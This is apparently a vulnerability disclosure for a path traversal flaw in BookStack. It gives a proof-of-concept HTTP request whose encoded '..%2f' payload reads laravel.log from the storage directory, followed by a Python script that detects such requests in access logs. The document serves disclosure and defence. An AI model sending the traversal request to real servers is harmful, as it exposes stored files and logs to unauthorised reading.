While reading the recent BookStack source code (85dc8d), I discovered a path traversal vulnerability. An authenticated user can access all files stored in the storage directory.
```
GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: XSRF-TOKEN=eyJpdiI6IkY0TGptRjlIa29xXC9iSFZqaE91bzVnPT0iLCJ2YWx1ZSI6Im9nZVZSblYxQmt1QXE5Tk9wS0NHVnhraGUySWlrNjhEZGVyeWhoN0ZOdjcxc2ZzTUFIYlozTHVJVzFMZ3VMMjdROUhCUTFjY2s4MVl0MUIxNGU0eWlnT1ErQlpUNHBGQTBJOHErcjR3MW1USVlkbGxCN21INm5pSDZVbk1pQkVBIiwibWFjIjoiNjZkNTUzM2YzMDE2ZjQwZTBiZTM5MTQ5NDY4NjQ4NmE1YzlkOTBhMDIyZjIyNTI2YjYxNjdiMWVhY2ZiMThiZCJ9; bookstack_session=eyJpdiI6Ik1iSDluUVVNU2JMblh0YmJmSjhNSEE9PSIsInZhbHVlIjoiS04wWk5DaEthMVVxUVFuMlwvNGdqVHpHRE95bFk1VjNJTzRvZTZQeVV1blZ3SUhFQ21ySTF1eFRWUWFtZlBiTEdTVzlCWlFxOGdUVEl4RmN1aDhIcUNzXC9tamFKQk1hVStuS2o3RUlUczJQRlo2OGp6NGs2OHU3Q1FGMjZJVlpLUSIsIm1hYyI6ImM3NmY2YWQ0MjdlYTU5OGEyMmQxNWI1NDMyMTQwMzE3NWMzODhiNmFiZDJhN2VmODA1YzExOTVjMWY1MTZmNTIifQ%3D%3D
Upgrade-Insecure-Requests: 1
```
Read log files whose paths are predictable.
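
A log check for the request shown above, as an added example that is not part of the original report or of BookStack's code: it percent-decodes each `/uploads/images/` request path, resolves it lexically, and reports requests that end up outside the image prefix. The log lines, client addresses and combined-log layout are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Route prefix taken from the request on the page.
IMAGE_PREFIX = "/uploads/images/"

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2022:10:00:01 +0000] "GET /uploads/images/gallery/2021-11/diagram.png HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2022:10:00:07 +0000] "GET /uploads/images/..%2f/..%2f/logs/laravel.log HTTP/1.1" 200 88211
192.0.2.10 - - [01/Jan/2022:10:00:09 +0000] "GET /uploads/images/gallery/../gallery/diagram.png HTTP/1.1" 200 5120
192.0.2.10 - - [01/Jan/2022:10:00:12 +0000] "GET /books/handbook HTTP/1.1" 200 9932
"""

# client, identd, user, [timestamp], "METHOD path PROTOCOL", status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def resolved_path(raw_path: str) -> str:
    """Percent-decode once and collapse '.', '..' and empty segments lexically."""
    path = unquote(raw_path.split("?", 1)[0]).replace("\\", "/")
    return posixpath.normpath(path)


def escapes_image_root(raw_path: str) -> bool:
    """True when a request under IMAGE_PREFIX resolves to somewhere outside it."""
    if not raw_path.startswith(IMAGE_PREFIX):
        return False  # other routes are out of scope for this check
    return not (resolved_path(raw_path) + "/").startswith(IMAGE_PREFIX)


def find_traversal(log_text: str):
    """Return (client, resolved path, status) for each escaping image request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and escapes_image_root(m.group(3)):
            hits.append((m.group(1), resolved_path(m.group(3)), int(m.group(4))))
    return hits


if __name__ == "__main__":
    for client, path, status in find_traversal(SAMPLE_LOG):
        print(f"{client} reached {path} (HTTP {status})")
```

The third sample line contains `..` but stays inside the image prefix, so it is not reported; the check is on where the path resolves, not on the presence of dot segments.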